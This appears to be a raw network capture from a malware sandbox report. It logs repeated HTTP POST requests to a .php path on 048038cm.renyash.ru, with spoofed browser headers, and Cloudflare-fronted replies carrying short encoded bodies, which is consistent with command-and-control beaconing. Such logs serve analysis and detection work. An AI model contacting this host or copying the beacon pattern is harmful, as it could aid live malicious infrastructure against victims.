                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7s6AsHd4X9BaK8dh8J%2FTeU3vkVIVCPVC5nMsTqcK%2BjlUc5gRcbN3IILFdz3BzTRQeJcsPrdbptCyKrVwNcdlEz4wazPyU8xYTGbaZ4EEfIAF93v2EDyOYUJrlbixBiZYNLDPwFz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b48af1f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12349&min_rtt=1677&rtt_var=10545&sent=740&recv=812&lost=0&retrans=2&sent_bytes=114238&recv_bytes=495606&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 3f 27 36 5f 37 3b 30 52 24 05 21 04 2a 2d 0f 13 2a 0e 05 07 29 5e 38 0f 27 3b 23 01 3c 28 32 07 27 01 26 1e 36 13 37 0f 3f 00 21 46 04 1e 21 11 20 2d 30 5f 3d 23 00 0a 3d 3c 05 04 22 0e 21 5f 24 2a 00 0a 26 28 27 54 21 3f 27 1d 25 2f 2c 0e 2c 27 32 5a 2d 56 39 56 25 14 2c 5e 0e 12 3a 0f 32 1e 39 11 28 16 32 00 27 56 37 12 32 3b 3d 11 24 28 24 08 34 2b 2d 59 28 0e 33 56 24 06 38 56 39 3b 09 59 27 5f 33 0e 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?'6_7;0R$!*-*)^8';#<(2'&67?!F! -0_=#=<"!_$*&('T!?'%/,,'2Z-V9V%,^:29(2'V72;=$($4+-Y(3V$8V9;Y'_3+"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:17.756759882 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:17.770896912 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7s6AsHd4X9BaK8dh8J%2FTeU3vkVIVCPVC5nMsTqcK%2BjlUc5gRcbN3IILFdz3BzTRQeJcsPrdbptCyKrVwNcdlEz4wazPyU8xYTGbaZ4EEfIAF93v2EDyOYUJrlbixBiZYNLDPwFz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b48af1f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12349&min_rtt=1677&rtt_var=10545&sent=740&recv=812&lost=0&retrans=2&sent_bytes=114238&recv_bytes=495606&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 3f 27 36 5f 37 3b 30 52 24 05 21 04 2a 2d 0f 13 2a 0e 05 07 29 5e 38 0f 27 3b 23 01 3c 28 32 07 27 01 26 1e 36 13 37 0f 3f 00 21 46 04 1e 21 11 20 2d 30 5f 3d 23 00 0a 3d 3c 05 04 22 0e 21 5f 24 2a 00 0a 26 28 27 54 21 3f 27 1d 25 2f 2c 0e 2c 27 32 5a 2d 56 39 56 25 14 2c 5e 0e 12 3a 0f 32 1e 39 11 28 16 32 00 27 56 37 12 32 3b 3d 11 24 28 24 08 34 2b 2d 59 28 0e 33 56 24 06 38 56 39 3b 09 59 27 5f 33 0e 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?'6_7;0R$!*-*)^8';#<(2'&67?!F! -0_=#=<"!_$*&('T!?'%/,,'2Z-V9V%,^:29(2'V72;=$($4+-Y(3V$8V9;Y'_3+"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:18.094739914 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:18.622169018 CET975INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tanm%2BAg99va084hqtIkzgqSBCZatGFt9bawl9%2BqD3DvLz%2F%2BIpeGEar7y5ADHO6726aGQv5BAC%2BvhPtgY%2BXL7p7GIoEggA05zAaTzKzONp5QC3LpfxwRFB3ENx6SXhMFp9kP%2FuSOj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b501e5042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12743&min_rtt=1677&rtt_var=11345&sent=746&recv=817&lost=0&retrans=2&sent_bytes=115228&recv_bytes=498012&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 54 2b 24 32 1d 23 15 33 0b 33 2f 26 5e 2a 13 07 10 29 23 37 40 2b 38 37 1c 25 3b 38 5f 2b 06 3d 1a 33 11 21 0e 36 13 24 55 28 00 21 46 04 1e 21 1e 37 00 28 1d 3e 0d 21 1f 29 2f 2c 17 22 20 21 5e 27 03 2d 57 25 5e 3b 52 22 3c 0e 09 33 12 2c 09 38 1d 3e 5c 2e 1e 3d 55 24 3e 2c 5e 0e 12 39 52 26 20 22 03 2b 28 17 5b 24 09 23 57 25 3b 0b 5a 24 5d 3f 1c 20 5e 25 5d 29 33 27 1d 26 3c 24 55 2d 28 38 04 27 29 02 56 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#T+$2#33/&^*)#7@+87%;8_+=3!6$U(!F!7(>!)/," !^'-W%^;R"<3,8>\.=U$>,^9R& "+([$#W%;Z$]? ^%])3'&<$U-(8')V)!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:18.626844883 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:18.959321022 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:19.490325928 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRf%2BAz2Pt7pRaKBhl4l%2BkxMZZeizVMEqnmt77qwduffSceO222VMAh2GAMIjMAHLt9538fQQV6PwoTQaB1vhyBbUMqYtAcb8D7g4TFNSJ1q6QaovrwxrbBUN3ccMcm3EvgWIyKJN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b557c7842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12409&min_rtt=1677&rtt_var=10508&sent=752&recv=822&lost=0&retrans=2&sent_bytes=116228&recv_bytes=500394&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 56 2b 24 2a 5f 20 05 2c 1c 33 3f 2e 14 3d 5b 25 1e 3e 09 28 1d 2b 28 1e 0e 25 16 0e 12 28 06 2d 19 27 3f 32 1c 35 3d 28 53 28 3a 21 46 04 1e 22 05 20 3e 28 1d 29 0d 3d 54 3d 02 02 14 21 30 1b 5c 33 2a 31 52 25 38 24 0b 35 2f 2f 50 33 5a 27 50 3b 42 36 5e 39 0e 22 0c 31 04 2c 5e 0e 12 39 1a 31 20 39 5b 28 28 1b 5a 24 56 3b 50 25 38 3d 59 30 15 20 0f 20 06 3e 07 29 33 27 53 30 3f 2c 52 2e 28 28 07 33 2a 2c 13 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#V+$*_ ,3?.=[%>(+(%(-'?25=(S(:!F" >()=T=!0\3*1R%8$5//P3Z'P;B6^9"1,^91 9[((Z$V;P%8=Y0 >)3'S0?,R.((3*,)!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:19.491246939 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:19.826699018 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:20.361309052 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRsXljzh6GSrPVtkLifdNw5FO1KGZ4iT3k7tIdkab%2FtIlIqrmh1alCCaVsXR7lDXCSZJEXrZRS9pAKlIpqkQdAoa2EWz6Nu%2Fr3wrCL8q0vdOdDbT4ggwMO8ad6e3uJhsWqQyXs4l"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b5aea2e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11208&min_rtt=1677&rtt_var=8134&sent=758&recv=827&lost=0&retrans=2&sent_bytes=117218&recv_bytes=502800&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1f 3c 24 26 58 20 2b 05 0e 33 05 3a 59 2b 2d 29 11 29 0e 23 41 29 2b 3f 55 25 5e 38 1d 2b 06 2d 1a 27 2f 07 08 21 2d 37 0b 2b 10 21 46 04 1e 21 13 23 3d 33 00 3d 30 36 0f 29 12 27 03 23 30 29 5e 27 2a 26 0e 25 38 33 53 21 05 24 0e 30 02 2c 0e 2c 34 32 14 2f 23 3d 52 25 14 2c 5e 0e 12 3a 0e 24 20 2a 03 2b 3b 3d 12 24 56 27 55 26 2b 21 10 30 15 06 0e 23 5e 21 5f 3c 33 24 0b 24 01 01 0d 3a 38 27 5f 27 5f 2c 1d 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<$&X +3:Y+-))#A)+?U%^8+-'/!-7+!F!#=3=06)'#0)^'*&%83S!$0,,42/#=R%,^:$ *+;=$V'U&+!0#^!_<3$$:8'_'_,)!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:20.362993002 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:20.700031042 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:21.184715033 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AWgKVoXEkCVrOWl9s8hTlcYd2fHvYtkytz91JXJrAkIt3x%2BAGa%2FbFjCl1AkqDn31Tpv3Fx8Oq5nNQPp%2FiLQN5itor%2B3T7kI7CUMyiUl68Nrvw00Z0CRmkfUnjd9mBFnvG7rAVxW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b60688042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10435&min_rtt=1677&rtt_var=6923&sent=763&recv=832&lost=0&retrans=2&sent_bytes=118207&recv_bytes=505206&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 2a 34 2d 01 23 2b 23 0b 26 3c 2a 5f 29 04 22 05 28 23 3c 19 2a 06 23 56 25 06 24 5e 3c 28 0c 0a 30 01 2d 09 22 3e 34 1f 2b 00 21 46 04 1e 21 1e 34 3d 30 12 29 0d 2d 52 2a 2f 20 16 22 20 13 17 24 2a 26 09 27 28 28 0a 20 3c 23 54 24 02 24 09 2d 37 29 07 2e 33 26 0f 26 14 2c 5e 0e 12 39 18 26 33 3a 04 28 01 26 05 24 1e 16 0c 32 38 26 04 24 15 33 13 34 38 31 5f 2b 1e 27 1f 30 11 3b 0b 3a 05 24 01 30 3a 30 50 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U*4-#+#&<*_)"(#<*#V%$^<(0-">4+!F!4=0)-R*/ " $*&'(( <#T$$-7).3&&,^9&3:(&$28&$3481_+'0;:$0:0P*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:21.190761089 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:21.528033018 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:22.071126938 CET971INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEyB6MHb3CtLjAeMMg64VbAwrn6xJYCHmNma3%2F49UeHv7d7ETOPPn1sik8kHCDueNuFcrtVA4qlm%2F4evSxwnxngvPZiC0O%2Bdld3Zaw76FGcm1Y5Mw54%2Fd4US8z0VjSO%2FtJYnDFpS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b658df642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9870&min_rtt=1677&rtt_var=6263&sent=768&recv=837&lost=0&retrans=2&sent_bytes=119200&recv_bytes=507612&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 28 34 00 13 37 02 37 0a 24 05 3e 5f 2b 2d 0b 13 2a 0e 2b 43 2a 16 30 08 25 06 0a 12 28 01 2e 08 25 2f 36 1d 21 5b 24 55 28 10 21 46 04 1e 21 5d 20 2e 3c 12 2a 1d 26 0d 3e 02 20 5c 23 23 2a 00 30 04 2d 1b 26 16 01 52 36 05 24 0f 25 3c 27 1a 2d 37 22 5c 3a 30 26 0b 24 3e 2c 5e 0e 12 39 15 26 0e 3e 04 3f 16 13 5a 27 23 27 50 27 38 2d 5b 27 28 33 57 23 5e 26 07 28 0e 34 0c 33 2c 3f 0e 2e 3b 23 14 30 39 37 0e 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(477$>_+-*+C*0%(.%/6![$U(!F!] .<*&> \##*0-&R6$%<'-7"\:0&$>,^9&>?Z'#'P'8-['(3W#^&(43,?.;#097+"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:22.071964979 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:22.412003040 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:22.907486916 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjB3joHNbt5Gh%2BCVd5n%2BQcsMhzku5qasdpcIKQIVhCo0uI78UxOxp7MvHEW78LCnBgOvV30xBtFVb0dlvBE6Yhx4%2BfTF0p2gBeRxc4JZnW0PFovpIDvG9s11e%2BxFV4bRKM82mr3e"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b6b1be242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10256&min_rtt=1677&rtt_var=7533&sent=773&recv=842&lost=0&retrans=2&sent_bytes=120196&recv_bytes=510018&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 28 24 21 00 20 05 06 11 24 3c 3e 5f 29 3d 00 02 2a 1e 20 1c 2a 2b 23 54 32 38 3c 12 2b 38 0c 09 24 2f 32 57 35 3d 28 1f 2b 10 21 46 04 1e 21 11 34 07 33 02 3d 33 25 1f 3e 02 3c 14 22 1e 36 06 33 3a 29 53 32 06 3b 54 20 2f 2f 55 24 2f 24 0b 38 27 35 02 39 0e 3a 0c 31 3e 2c 5e 0e 12 3a 08 25 0e 1c 02 3c 06 17 5b 24 56 34 0c 31 38 32 00 26 2b 23 55 34 3b 21 5f 2b 20 37 56 26 2c 3f 0f 2d 05 0a 05 24 3a 3f 0d 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#($! $<>_)=* *+#T28<+8$/2W5=(+!F!43=3%><"63:)S2;T //U$/$8'59:1>,^:%<[$V4182&+#U4;!_+ 7V&,?-$:?>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:22.908811092 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:23.241199970 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:23.774158001 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6DroTWXZ2RRfbSulfX%2FmkIs%2F%2FkoVq7XuWOc4Z6m043iGAAaaOB42YCZCHAoEyALqJVUoQbYuAFlzOLD31umOvpCEQ7c2MOP7OtaHZVqUzmixyEctSMDJleaFqDSWUW7%2BLi9hggc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b70490f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10452&min_rtt=1677&rtt_var=8176&sent=778&recv=847&lost=0&retrans=2&sent_bytes=121189&recv_bytes=512424&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 3f 1a 08 59 21 3b 34 1c 24 3f 22 5f 2b 2d 3d 5c 3e 56 2f 43 3e 2b 3b 1c 26 38 3b 02 28 16 0b 1a 24 01 31 09 22 03 34 1c 3c 10 21 46 04 1e 22 01 23 3d 30 12 3e 1d 08 0b 2b 3f 38 17 36 23 22 07 24 2a 0f 53 25 5e 27 56 20 3f 33 1c 24 3f 30 0b 3b 42 35 07 2e 0e 32 0d 25 3e 2c 5e 0e 12 3a 09 32 30 29 1f 29 38 18 05 26 30 3b 51 27 3b 3a 05 33 05 20 0e 34 06 2d 5c 29 23 27 10 33 01 3b 0b 39 05 09 5e 33 29 2b 0d 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U?Y!;4$?"_+-=\>V/C>+;&8;($1"4<!F"#=0>+?86#"$*S%^'V ?3$?0;B5.2%>,^:20))8&0;Q';:3 4-\)#'3;9^3)+*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:23.777566910 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:24.110316038 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:24.636394978 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Px0Ms4KRgk4QN6yCrcd3M53iJzPmQsFZjpHQPEYQkVrM2y%2BOAehybMZB%2BtUsHfkLSPQNPhW68tSZsj3%2BclrbrXKwTZtJJOtXVN4UM38V4PK6E7OUF4PNwWrpcDAnh7cgXkw620FC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b75ae8842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11443&min_rtt=1677&rtt_var=10277&sent=784&recv=852&lost=0&retrans=2&sent_bytes=122182&recv_bytes=514830&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 28 1a 0b 01 34 28 27 0a 30 05 21 00 3d 3d 2d 5d 28 33 30 1c 29 06 23 1d 31 16 0e 13 28 06 35 1c 25 3f 3a 51 36 04 38 52 2a 2a 21 46 04 1e 21 5a 20 00 34 5b 29 1d 26 0b 3d 3f 3c 14 23 33 25 5d 24 14 04 08 25 16 01 53 35 05 38 09 25 3c 30 09 2c 0a 2e 5b 2d 20 39 54 32 14 2c 5e 0e 12 3a 0e 26 09 25 1f 29 38 26 01 27 1e 23 55 26 3b 2d 5b 24 3b 27 54 37 16 26 00 29 23 37 56 24 2c 38 10 2d 05 20 07 24 17 33 09 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (4('0!==-](30)#1(5%?:Q68R**!F!Z 4[)&=?<#3%]$%S58%<0,.[- 9T2,^:&%)8&'#U&;-[$;'T7&)#7V$,8- $3*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:24.637389898 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:24.972012997 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:25.499422073 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfXav%2BEwbDdISWDJgZlhZN29Cgfti9gPwWwAuVZmnBnhP%2F1tSjUvekosEEVRk%2FXEyIfn0Q5%2BnQjiCk97YX7aF8Zvi2lsVN3XCJrFi4dpfcoXMeKmUs2WtX8fDzr25yLfgmhM68yh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b7b1cac42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11778&min_rtt=1677&rtt_var=10695&sent=790&recv=857&lost=0&retrans=2&sent_bytes=123174&recv_bytes=517224&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 28 1a 2d 01 20 5d 33 0a 30 5a 21 06 2a 03 39 5c 29 09 2f 44 29 28 37 57 32 3b 27 07 3f 06 0c 42 24 2c 2e 1d 22 04 37 0f 28 3a 21 46 04 1e 22 02 34 2e 34 5f 3d 0d 00 0c 3d 02 02 16 36 0e 13 5d 26 2a 0c 0b 31 38 09 52 21 2c 27 55 25 3c 2c 08 2c 34 0b 06 3a 30 39 55 25 04 2c 5e 0e 12 3a 0b 31 09 35 10 2b 38 25 59 27 09 23 56 32 02 26 00 24 2b 3b 1e 21 28 25 5e 28 0e 24 0e 33 2f 20 54 3a 5d 23 5d 30 39 2f 0c 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(- ]30Z!*9\)/D)(7W2;'?B$,."7(:!F"4.4_==6]&*18R!,'U%<,,4:09U%,^:15+8%Y'#V2&$+;!(%^($3/ T:]#]09/=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:25.500061035 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:25.833612919 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:26.370347023 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:26 GMT
